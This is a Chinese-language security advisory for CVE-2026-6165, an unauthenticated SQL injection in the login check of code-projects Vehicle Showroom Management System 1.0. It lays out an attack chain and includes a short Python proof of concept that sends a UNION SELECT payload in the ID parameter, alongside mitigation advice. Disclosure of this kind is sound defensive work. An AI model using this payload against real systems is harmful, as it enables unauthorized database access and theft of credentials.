IPBUF安全漏洞报告
English
CVE-2026-6165 CVSS 7.3 高危

CVE-2026-6165 Vehicle Showroom SQL注入漏洞

披露日期: 2026-04-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6165
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
code-projects Vehicle Showroom Management System

相关标签

SQL注入code-projectsVehicle Showroom远程无认证

漏洞概述

code-projects Vehicle Showroom Management System 1.0版本中的/util/Login_check.php文件存在SQL注入漏洞。由于未对用户输入的参数“ID”进行充分的过滤和验证,攻击者可以通过构造恶意SQL语句并远程发送请求,成功利用该漏洞获取数据库敏感信息、篡改数据或破坏系统完整性。目前该漏洞的利用代码已公开,风险较高。

技术细节

该漏洞位于系统的登录检查逻辑中(/util/Login_check.php)。在处理用户请求时,应用程序直接将HTTP请求参数“ID”拼接到SQL查询语句中,而没有使用预处理语句或进行有效的输入过滤。这种不安全的编码方式使得攻击者能够通过在“ID”参数中注入恶意的SQL语法(如UNION SELECT, ' OR '1'='1等),欺骗后端数据库执行非预期的命令。攻击者无需身份认证即可通过网络发起攻击,可能导致数据库中的敏感信息泄露,数据被非法修改或删除。

攻击链分析

STEP 1
侦察
攻击者识别目标系统为code-projects Vehicle Showroom Management System 1.0,并确认存在/util/Login_check.php接口。
STEP 2
漏洞利用
攻击者构造包含恶意SQL代码的Payload(例如在ID参数中注入UNION查询),并发送HTTP请求至目标接口。
STEP 3
执行攻击
后端数据库接收到被污染的参数并执行注入的SQL语句,导致数据泄露或被修改。
STEP 4
后果达成
攻击者成功获取数据库中的敏感信息(如用户名、密码哈希),或者利用此漏洞进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# POC for CVE-2026-6165 # Target: /util/Login_check.php # Parameter: ID import requests target_url = "http://target_host/util/Login_check.php" payload = "1' UNION SELECT 1, version(), 3, 4-- -" params = { "ID": payload } try: response = requests.get(target_url, params=params) if response.status_code == 200: print("Vulnerability might exist. Check response for SQL errors or data.") print(response.text) except Exception as e: print(f"Error: {e}")

影响范围

code-projects Vehicle Showroom Management System 1.0

防御指南

临时缓解措施
建议立即部署Web应用防火墙(WAF)以拦截针对/util/Login_check.php的恶意SQL注入请求。在未修复前,可暂时禁用该功能或限制对该文件的访问权限。同时,应确保数据库账户遵循最小权限原则,以减少潜在的数据泄露风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表